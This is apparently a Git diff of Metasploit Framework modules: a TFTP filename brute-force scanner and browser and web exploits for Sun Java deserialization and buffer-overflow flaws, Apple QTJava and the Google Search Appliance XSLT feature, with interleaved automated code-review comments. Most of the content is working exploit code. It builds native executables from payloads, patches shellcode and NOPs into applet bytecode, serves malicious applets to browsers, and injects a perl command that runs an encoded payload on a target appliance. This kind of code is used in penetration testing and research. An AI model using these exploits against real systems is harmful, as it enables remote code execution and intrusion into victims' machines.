diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 8263b53244..c105bfb257 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT(69), - OptPath.new('DICTIONARY', [ true, 'The list of filenames', File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ]) + OptPath.new('DICTIONARY', [ true, 'The list of filenames', + File.join(Msf::Config.install_root, "data", "wordlists", "tftp.txt") ]) ], self.class) end @@ -41,9 +42,9 @@ class Metasploit3 < Msf::Auxiliary { 'Msf' => framework, 'MsfExploit' => self, - } + } ) - + fd = File.open(datastore['DICTIONARY'], 'r') fd.read(fd.stat.size).split("\n").each do |filename| filename.strip! diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index b2fff27809..0fa5934290 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -12,37 +16,37 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML - + def initialize( info = {} ) - + super( update_info( info, - 'Name' => 'Sun Java Calendar Deserialization Exploit', - 'Description' => %q{ + 'Name' => 'Sun Java Calendar Deserialization Exploit', + 'Description' => %q{ This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. - - The payload can be either a native payload which is generated as an executable and + + The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. - + The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected). }, - 'License' => MSF_LICENSE, - 'Author' => [ 'sf', 'hdm' ], - 'Version' => '1', - 'References' => + 'License' => MSF_LICENSE, + 'Author' => [ 'sf', 'hdm' ], + 'Version' => '$Revision$', + 'References' => [ [ 'CVE', '2008-5353' ], [ 'OSVDB', '50500'], [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ], [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ], [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ], - [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] + [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] ], - 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], - 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => + 'Platform' => [ 'win', 'osx', 'linux', 'solaris' ], + 'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => [ - [ 'Generic (Java Payload)', + [ 'Generic (Java Payload)', { # This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp 
payloads 'Platform' => ['win'], @@ -50,36 +54,47 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_CMD, } ], - [ 'Windows x86 (Native Payload)', + [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], - [ 'Mac OS X PPC (Native Payload)', + [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'Mac OS X x86 (Native Payload)', + [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], - [ 'Linux x86 (Native Payload)', + [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, } ], ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 )) end + def exploit + # load the static jar file + path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) + fd = File.open( path, "rb" ) + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri( cli, request ) data = nil host = nil @@ -90,15 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote send_redirect( cli, get_resource() + '/', '') return end - + print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) - + payload = regenerate_payload( cli ) if not payload print_status( "Failed to generate the payload." ) return end - + if target.name == 'Generic (Java Payload)' if datastore['LHOST'] host = datastore['LHOST'] 
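Review bot: The new `exploit` reads the jar with a bare `File.open` / `read` / `close`, so an exception raised by `read` skips the `close` (the descriptor stays open until garbage collection) and leaves `@jar_data` unset; the block form `@jar_data = File.open( path, "rb" ) { |fd| fd.read }` closes the file on every path in one line. The same open/read/close sequence is added in java_getsoundbank_bof.rb, java_setdifficm_bof.rb, qtjava_pointer.rb and google_proxystylesheet_exec.rb, and the same replacement applies there. Because `generate_jar` now only returns `@jar_data`, serving a request depends on `exploit` having run first; a comment such as `# @jar_data is loaded once by exploit before the HTTP service starts` would record that, and `raise "jar data not loaded" unless @jar_data` in `exploit` or `generate_jar` would fail loudly instead of handing nil to send_response. `on_request_uri` continues past the end of this hunk.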
@@ -110,15 +125,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." ) end else - + if target['Arch'] == ARCH_X86 data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win' - data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' + data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux' elsif target['Arch'] == ARCH_PPC data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx' end - + if data print_status( "Generated executable to drop (#{data.length} bytes)." ) data = Rex::Text.to_hex( data, prefix="" ) @@ -126,19 +141,19 @@ class Metasploit3 < Msf::Exploit::Remote print_status( "Failed to generate the executable." ) return end - + end - - send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) + + send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end - - print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) + + print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end - + def generate_html( data, host, port ) html = "Loading, Please Wait..." html += "

Loading, Please Wait...

" @@ -149,13 +164,9 @@ class Metasploit3 < Msf::Exploit::Remote html += "" return html end - + def generate_jar() - path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" ) - fd = File.open( path, "rb" ) - data = fd.read(fd.stat.size) - fd.close - return data + return @jar_data end - + end diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 4fcaf0ab88..7776108f31 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking # # This module acts as an HTTP server 
@@ -26,25 +26,25 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the getSoundbank function in the Sun JVM. - + The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. - - The effected Java versions are JDK and JRE 6 Update 16 and earlier, - JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and + + The effected Java versions are JDK and JRE 6 Update 16 and earlier, + JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. - + NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'kf', # Original PoC/exploit 'jduck' # metasploit version ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3867' ], [ 'OSVDB', '59711' ], @@ -70,19 +70,19 @@ No automatic targetting for now ... } ], =end - [ 'J2SE 1.6_16 on Windows x86', + [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'J2SE 1.6_16 on Mac OS X PPC', + [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'J2SE 1.6_16 on Mac OS X x86', + [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, 
@@ -93,23 +93,34 @@ No automatic targetting for now ... 'DisclosureDate' => 'Nov 04 2009' )) end - - + + + def exploit + # load the static jar + path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar") + fd = File.open(path, "rb") + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] @@ -118,27 +129,27 @@ No automatic targetting for now ... end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing if (not req.uri.match(/\.jar$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), 
@@ -148,10 +159,10 @@ No automatic targetting for now ... }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") - send_response(cli, generate_applet(cli, req), + send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' @@ -169,14 +180,18 @@ No automatic targetting for now ... - + | - # ugh.. pain + # finalize the html + jar_name = rand_text_alphanumeric(32) + html.gsub!(/JARNAME/, jar_name) + + # add payload debug_payload = false pload = "" pload << "\xcc" if debug_payload @@ -188,11 +203,12 @@ No automatic targetting for now ... print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) - + + # add nops nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) - + return html end @@ -201,7 +217,7 @@ No automatic targetting for now ... def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -211,13 +227,7 @@ No automatic targetting for now ... this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3867.jar") - - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - - return data - end + return @jar_data + end end diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 39dfdc37ea..add9609552 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb 
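Review bot: `jar_name = rand_text_alphanumeric(32)` carries no `.jar` suffix, while the parallel change in java_setdifficm_bof.rb appends `".jar"`, and `on_request_uri` in this file only serves the applet when `req.uri` matches `/\.jar$/i`. Unless the template already writes the extension after `JARNAME` (the heredoc body is not visible in this hunk), the browser's archive request would be answered with the HTML page instead of the jar. Either change it to `jar_name = rand_text_alphanumeric(32) + ".jar"` to match the sibling module, or add a comment stating that the template supplies the extension. `generate_html` begins before this hunk.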
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking # # This module acts as an HTTP server @@ -26,24 +26,24 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow', 'Description' => %q{ This module exploits a flaw in the setDiffICM function in the Sun JVM. - + The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. - - The effected Java versions are JDK and JRE 6 Update 16 and earlier, + + The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. - + NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'jduck' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3869' ], [ 'OSVDB', '59710' ], @@ -70,19 +70,19 @@ No automatic targetting for now ... } ], =end - [ 'J2SE 1.6_16 on Windows x86', + [ 'J2SE 1.6_16 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'J2SE 1.6_16 on Mac OS X PPC', + [ 'J2SE 1.6_16 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'J2SE 1.6_16 on Mac OS X x86', + [ 'J2SE 1.6_16 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, 
@@ -93,23 +93,23 @@ No automatic targetting for now ... 'DisclosureDate' => 'Nov 04 2009' )) end - - + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] @@ -118,27 +118,27 @@ No automatic targetting for now ... end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing if (not req.uri.match(/\.jar$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) print_status("Sending redirect so path ends with / ...") send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(payload.encoded), @@ -148,10 +148,10 @@ No automatic targetting for now ... }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") - send_response(cli, generate_applet(cli, req), + send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' 
@@ -169,14 +169,18 @@ No automatic targetting for now ... - + | - # ugh.. pain + # finalize html + jar_name = rand_text_alphanumeric(32)+".jar" + html.gsub!(/JARNAME/, jar_name) + + # put payload into html debug_payload = false pload = "" pload << "\xcc" if debug_payload @@ -188,20 +192,31 @@ No automatic targetting for now ... print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload)) end html.gsub!(/SCODE/, Rex::Text.to_hex(pload, '')) - + + # put nops into html nops = "\x90\x90\x90\x90" html.gsub!(/NOPS/, Rex::Text.to_hex(nops, '')) #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops)) - + return html end + def exploit + path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar") + fd = File.open(path, "rb") + @jar_data = fd.read(fd.stat.size) + fd.close + + super + end + + def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -211,13 +226,7 @@ No automatic targetting for now ... this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar") - - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - - return data - end + return @jar_data + end end diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 2a61700dc8..012721c37b 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -26,18 +26,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access', 'Description' => %q{ This module exploits an arbitrary memory access vulnerability in the - Quicktime for Java API provided with Quicktime 7. + Quicktime for Java API provided with Quicktime 7. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ 'hdm', # Original exploit for Mac OS X PPC / Win32 'kf', # Added support for Mac OS X X86 'ddz' # Discovered bug, provided tips ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2007-2175'], ['OSVDB', '34178'], 
@@ -54,100 +54,112 @@ class Metasploit3 < Msf::Exploit::Remote # # Problem with generic payloads + regenerate_payload still :( # -# [ 'Quicktime 7 Automatic', +# [ 'Quicktime 7 Automatic', # { # 'Platform' => ['win', 'osx'], # 'Arch' => [ARCH_X86, ARCH_PPC] # } # ], - [ 'Quicktime 7 on Windows x86', + [ 'Quicktime 7 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], - [ 'Quicktime 7 on Mac OS X PPC', + [ 'Quicktime 7 on Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], - [ 'Quicktime 7 on Mac OS X x86', + [ 'Quicktime 7 on Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } - ], + ], ], # 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 23 2007' )) end + + def exploit + # load the class data + path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class") + fd = File.open(path, "rb") + @class_data = fd.read(fd.stat.size) + fd.close + + super + end + + def on_request_uri(cli, req) - + # Create a cached mapping between IP and detected target @targetcache ||= {} @targetcache[cli.peerhost] ||= {} @targetcache[cli.peerhost][:update] = Time.now.to_i - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) case req.headers['User-Agent'] when /Windows/i print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[1] when /PPC Mac OS X/i print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...") - @targetcache[cli.peerhost][:target] = self.targets[2] + @targetcache[cli.peerhost][:target] = self.targets[2] when /Intel Mac OS X/i print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...") @targetcache[cli.peerhost][:target] = self.targets[3] end end - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:update]+60) rmq.push addr end end - + rmq.each {|addr| @targetcache.delete(addr) } - - + + # Request processing - + if (not 
req.uri.match(/\.class$/i)) - + # Redirect to the base directory so the applet code loads... if (not req.uri.match(/\/$/)) send_redirect(cli, get_resource() + '/', '') return end - + # Display the applet loading HTML print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") - send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' }) + send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' }) return end - + # Send the actual applet over print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' }) - + # Handle the payload handler(cli) end - + def generate_html() return "" end - + def generate_applet(cli, req) this_target = nil - if (target.name =~ /Automatic/) + if (target.name =~ /Automatic/) if (@targetcache[cli.peerhost][:target]) this_target = @targetcache[cli.peerhost][:target] else @@ -157,15 +169,12 @@ class Metasploit3 < Msf::Exploit::Remote this_target = target end - path = File.join(Msf::Config.install_root, "data", "exploits", "QTJavaExploit.class") + # make a copy.. + data = @class_data.dup - fd = File.open(path, "rb") - data = fd.read(fd.stat.size) - fd.close - # 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86 idx_targ = data.index("\x03\x10\xcc\x54") - + # 1024 bytes for shellcode idx_code = data.index("\x03\x10\xf0\x54") 
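Review bot: The comment `# make a copy..` should state the reason, since it is the point of this change: `# dup: patch_bytecode writes into the buffer in place and @class_data is shared by every request`. Directly below the copy, the two `data.index` lookups for the target and shellcode markers remain unchecked; if either marker is absent from the class file, `idx_targ` or `idx_code` is nil and `patch_bytecode` fails on `off -= 1` with a NoMethodError from inside the request handler. A guard such as `raise "marker not found in QTJavaExploit.class" unless idx_targ && idx_code` would report the real cause. `generate_applet` starts before this hunk and continues after it.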
@@ -175,34 +184,34 @@ class Metasploit3 < Msf::Exploit::Remote data = patch_bytecode(idx_code, data, tp.encoded) data = patch_bytecode(idx_targ, data, "\x01") end - + # Handle Mac OS X x86 / Windows x86 if (this_target.arch.include?(ARCH_X86)) - + if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows)) tp = regenerate_payload(cli, 'win', ARCH_X86, this_target) data = patch_bytecode(idx_code, data, tp.encoded) data = patch_bytecode(idx_targ, data, "\x03") end - + if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX)) tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target) data = patch_bytecode(idx_code, data, tp.encoded) - data = patch_bytecode(idx_targ, data, "\x02") - end - end + data = patch_bytecode(idx_targ, data, "\x02") + end + end return data - end + end def patch_bytecode(off, data, buff) - + cnt = 0 off -= 1 while (cnt < buff.length) - cnt += 1 + cnt += 1 while (! (data[off-1] == 0x10 && data[off+1] == 0x54)) - off+=1 + off += 1 end data[off]=buff[cnt-1] off += 1 @@ -211,5 +220,5 @@ class Metasploit3 < Msf::Exploit::Remote return data end - + end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 1abfb8f69a..f7a7a13865 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -19,14 +19,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', 'Description' => %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary - java methods to be called. Google released a patch and advisory to + java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance - must be able to connect back to your machine for this exploit to work. + must be able to connect back to your machine for this exploit to work. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet netcat-e', } - }, + }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], @@ -58,24 +58,18 @@ class Metasploit3 < Msf::Exploit::Remote # Handle incoming requests from the appliance def on_request_uri(cli, request) - + print_status("Handling new incoming HTTP request...") - - path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml") - - fd = File.open(path, "r") - data = fd.read(fd.stat.size) - fd.close exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))' - data.gsub!(/:x:MSF:x:/, exec_str) + data = @xml_data.gsub(/:x:MSF:x:/, exec_str) send_response(cli, data) end - + def check res = send_request_cgi({ 'uri' => '/search', - 'vars_get' => + 'vars_get' => { 'client' => rand_text_alpha(rand(15)+1), 'site' => rand_text_alpha(rand(15)+1), 
@@ -84,48 +78,54 @@ class Metasploit3 < Msf::Exploit::Remote 'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/' } }, 10) - + if (res and res.body =~ /cannot be resolved to an ip address/) print_status("This system appears to be vulnerable") return Exploit::CheckCode::Vulnerable end - + if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) print_status("This system appears to be patched") end - + print_status("This system is not exploitable") return Exploit::CheckCode::Safe end - - + + def exploit - + + # load the xml data + path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml") + fd = File.open(path, "r") + @xml_data = fd.read(fd.stat.size) + fd.close + print_status("Obtaining the appliance site and client IDs...") # Send a HTTP/1.0 request to learn the site configuration res = send_request_raw({ 'uri' => '/', 'version' => '1.0' }, 10) - + if !(res and res['location'] and res['location'] =~ /site=/) print_status("Could not read the location header: #{res.code} #{res.message}") return end - + m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im) if !(m and m[1] and m[2]) print_status("Invalid location header: #{res['location']}") - return + return end - + print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...") start_service - + print_status("Requesting a search using our custom XSLT...") res = send_request_cgi({ 'uri' => '/search', - 'vars_get' => + 'vars_get' => { 'client' => m[2], 'site' => m[1], @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote 'proxyreload' => '1' } }, 25) - + if (res) print_status("The server returned: #{res.code} #{res.message}") print_status("Waiting on the payload to execute...") @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("No response from the server") end - + print_status("Shutting down the web service...") stop_service end - + end
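Review bot: In the location-header error path, `print_status("Could not read the location header: #{res.code} #{res.message}")` dereferences `res` inside the branch that is also entered when `res` is nil (no reply before the timeout, presumably the `10` passed to send_request_raw), so an unresponsive appliance produces a NoMethodError instead of the intended message. Build the detail first, `detail = res ? "#{res.code} #{res.message}" : "no response"`, and print that. The file load added at the top of `exploit` would also be exception-safe as the one-liner `@xml_data = File.open(path, "r") { |fd| fd.read }`. `exploit` continues in the following hunks.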